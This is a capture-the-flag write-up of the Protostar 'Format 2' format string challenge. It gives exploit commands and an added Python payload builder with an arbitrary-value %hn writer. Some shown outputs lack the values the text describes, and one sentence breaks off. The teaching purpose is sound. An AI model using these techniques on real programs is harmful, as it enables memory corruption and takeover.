Saturday, December 22, 2012

exploit-exercises Protostar: Format 2

Again, for another challenge of the Protostar wargame, the source code of
Format 2 is provided as follows:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln() {
        char buffer[512];
        fgets(buffer, sizeof(buffer), stdin);
        printf(buffer);   /* the vulnerable call: user input is the format string */
        if(target == 64) {
                printf("you have modified the target :)\n");
        } else {
                printf("target is %d :(\n", target);
        }
}

int main(int argc, char **argv) {
        vuln();
}
Two changes are introduced compared to the previous challenge. The first is that the input is read from standard input with fgets() into buffer, a 512-byte local variable of vuln(), the function that makes the vulnerable printf() call. Because buffer lives in vuln()'s own stack frame, right above the frame printf() works from, the argument position that reaches it is much lower than in Format 1.
The second is that target must not merely be modified but set to one specific value: 64.
We start by finding the parameter position that will point to the start of
user@protostar:/opt/protostar/bin$ echo "AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x" | ./format2
target is 0 :(
The start of buffer is at the 4th position (the %x there prints 41414141, our AAAA marker), and it can be addressed directly with a positional argument:
user@protostar:/opt/protostar/bin$ echo "AAAA%4\$x" | ./format2
target is 0 :(
Next, we get the address at which the target variable is stored. It is a global in .bss, so the address is fixed:
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
080496e4 g     O .bss   00000004              target
With the address of target and the argument position of buffer known, we can start writing into target.
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%4$n"' | ./format2
target is 4 :(
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08AAAA%4$n"' | ./format2
target is 8 :(
%n stores the number of characters printed so far into the int whose address it consumes: the 4 address bytes alone give 4, and the extra AAAA give 8. Rather than padding with literal bytes, a minimum field width on one conversion does the job: %60d prints the first stack value printf() picks up as an argument (512 in the output below) padded to 60 characters, so the count is 4 + 60 = 64 by the time %4$n runs. Two details matter here: the width is a minimum, so the consumed value must fit in it (any 32-bit int fits in 11 characters), and mixing a plain %60d with a positional %4$n is undefined by the C standard but accepted by glibc.
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%60d%4$n"' | ./format2
��                                                         512
you have modified the target :)
And that is it.
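The payload construction above can be made mechanical. The following Python 3 script is an added example and not part of the original write-up; it assumes the target address 0x080496e4 and argument position 4 found above, a 32-bit little-endian target, and glibc's tolerance for mixing positional and non-positional specifiers. It reproduces the three payloads used above (count 4, 8 and 64), includes a dry-run of printf's character counter to check a payload before feeding it to the binary, and goes beyond this level with a two-halves %hn writer for full 32-bit values, which a single %n would need far too much output to reach. The file name fmt2.py in the usage comment is a name chosen here.

```python
import re
import struct

# Values taken from the write-up: target's address from objdump, and the
# printf argument slot at which the start of buffer shows up.
TARGET_ADDR = 0x080496e4
BUFFER_POS = 4

# Bytes that would cut the payload short before printf() ever sees it:
# NUL ends the string, newline ends fgets(), and '%' would start a specifier.
BAD_BYTES = {0x00, 0x0a, 0x25}


def _pack_addr(addr):
    """Little-endian 32-bit address (x86), rejecting bytes that break delivery."""
    raw = struct.pack("<I", addr)
    if BAD_BYTES & set(raw):
        raise ValueError("address 0x%08x contains a byte fgets/printf will not pass through" % addr)
    return raw


def _padding(target_count, current_count):
    """Fragment that raises printf's output counter from current_count to target_count.

    Small gaps use literal filler bytes (the AAAA in the write-up).  Larger
    gaps use a minimum field width: %60d consumes one stack int and prints
    at least 60 characters.  The width is exact as soon as it is >= 11,
    since a 32-bit int in decimal never exceeds 11 characters ("-2147483648").
    """
    gap = target_count - current_count
    if gap < 0:
        raise ValueError("counter is already past the requested value")
    if gap < 11:
        return b"A" * gap
    return b"%" + str(gap).encode() + b"d"


def fmt_write_payload(target_addr, value, param_pos):
    """Write `value` into the int at `target_addr` with a single %n.

    Layout: <address><padding>%<param_pos>$n.  %n stores the number of
    characters printed so far, so the padding must bring that count to
    exactly `value`.  Mixing a plain %60d with a positional %4$n is
    undefined by the C standard, but glibc (as on Protostar) accepts it.
    """
    addr = _pack_addr(target_addr)
    return addr + _padding(value, len(addr)) + b"%" + str(param_pos).encode() + b"$n"


def fmt_write_payload_hn(target_addr, value, param_pos):
    """Write a full 32-bit `value` as two 16-bit halves with %hn.

    Goes beyond the write-up: for a large value (say a code address) a single
    %n would need `value` characters of output; two short writes need at most
    about 128 KiB.  Both addresses go first, occupying argument slots
    param_pos (low half) and param_pos + 1 (high half).  The smaller half is
    written first so the counter only ever has to grow; when a half is already
    below the counter, 0x10000 is added, since %hn keeps only the low 16 bits.
    """
    lo, hi = value & 0xffff, (value >> 16) & 0xffff
    payload = _pack_addr(target_addr) + _pack_addr(target_addr + 2)
    count = len(payload)
    for half, pos in sorted([(lo, param_pos), (hi, param_pos + 1)]):
        goal = half if half >= count else half + 0x10000
        payload += _padding(goal, count) + b"%" + str(pos).encode() + b"$hn"
        count = goal
    return payload


_SPEC = re.compile(rb"%(?P<width>\d+)d|%(?P<pos>\d+)\$(?P<size>h?)n")


def simulate_n_writes(payload):
    """Dry-run printf's character counter over a payload built above.

    Returns [(argument position, value stored)] for each %n / %hn, assuming
    every %Nd field prints exactly N characters (see _padding).  Lets the
    payload be checked before it is fed to the real binary.
    """
    count, idx, writes = 0, 0, []
    for m in _SPEC.finditer(payload):
        count += m.start() - idx                  # literal bytes before the specifier
        if m.group("width") is not None:
            count += int(m.group("width"))        # padded conversion
        else:
            mask = 0xffff if m.group("size") == b"h" else 0xffffffff
            writes.append((int(m.group("pos")), count & mask))
        idx = m.end()
    return writes


if __name__ == "__main__":
    import sys
    # Usage on the target box: python3 fmt2.py | ./format2
    sys.stdout.buffer.write(fmt_write_payload(TARGET_ADDR, 64, BUFFER_POS) + b"\n")
```

The simulator is deliberately narrow: it only understands the %Nd and %k$n / %k$hn fragments the builders emit, which is enough to catch an off-by-a-few padding mistake before the binary is touched. The bad-byte check matters more than it looks here: an address containing 0x0a would be truncated by fgets(), and one containing 0x00 or 0x25 would never reach %n intact.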
